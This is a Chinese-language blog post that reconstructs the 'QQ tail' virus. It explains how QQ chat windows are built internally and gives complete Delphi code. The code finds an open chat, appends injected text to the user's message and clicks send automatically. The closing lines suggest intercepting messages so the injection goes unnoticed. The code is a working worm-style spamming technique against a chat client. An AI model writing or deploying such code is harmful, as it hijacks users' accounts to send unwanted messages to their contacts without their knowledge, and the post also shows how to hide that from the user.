前几天看到 wuqiu 兄 把 QQ尾巴病毒模拟了一遍,
我觉得通过查找窗体标题,不太合常理
回去用SPY++来查看了一下,原来,QQ的框架是这样的
其中,#32770(对话框)就是弹出的QQ聊天界面;内部的控件就如上图显示的那样,有Static(标签)、Button(按钮)、AfxWnd42(这个我猜类似panel的容器)、RICHEDIT(这里面就是显示我们的聊天纪录了)
具体的布局就不一一的细说了,你们可以自己打开SPY++看看,一目了然
其中,我们用到的只是其中两个控件,如下图:
前半部分是句柄,中间是标题,后半部分是类名
如:05240258~发送(&S)~Button
就是发送按钮,句柄是05240258
好了,知道了这些,想做点什么就很简单了
全部代码如下:
Procedure TForm1.Timer1Timer(Sender: TObject);
Var
hMemo, hRichEdit, HWindow, HButton: THandle; //句柄变量
szText : Array[0..255] Of char; //得到的字符串
MyText : String; //发送的字符串
Begin
HWindow := 0;//从零开始,即从第一个字窗体开始遍历查找
While true Do
Begin
//找是#32770(对话框)的窗体
HWindow := FindWindowEx(0, HWindow, '#32770', Nil);
If HWindow <> 0 Then
Begin
//找是AfxWnd42(这个我猜类似panel的容器)的窗体
hMemo := FindWindowEx(HWindow, 0, 'AfxWnd42', Nil);
If hMemo <> 0 Then
Begin
//找是RICHEDIT的窗体
hRichEdit := FindWindowEx(hMemo, 0, 'RichEdit', Nil);
If hRichEdit <> 0 Then
Begin
//想些什么随便啦,嘿嘿
MyText := ' 阿德是个大帅哥,嘿嘿';
//发消息,得到QQ中的文本
SendMessage(hRichEdit, WM_GetTEXT, 256,
integer(@szText[0]));
//加上自己的话
MyText := szText + MyText;
//再发给QQ
SendMessage(hRichEdit, WM_SETTEXT, 256,
integer(MyText));
//找到发送按钮
HButton := FindWindowEx(HWindow, 0, 'Button',
'发送(&S)');
//发点击消息,发送
SendMessage(HButton, BM_CLICK, 0, 0);
//退出,如果去掉这句,就是给所有打开的QQ窗体发
//否则,只发给最前面的QQ窗体
break;
End;
End;
End;
End;
End;
这也只是对QQ尾巴的一种猜测,程序有很多不尽如人意的地方,比如发的文本在QQ中显示一下然后再发送,就如 wuqiu 兄 的文章里说的,只要对消息进行拦截,然后再背地里偷偷的发送,就会神不知鬼不觉了
本文地址:http://com.8s8s.com/it/it5219.htm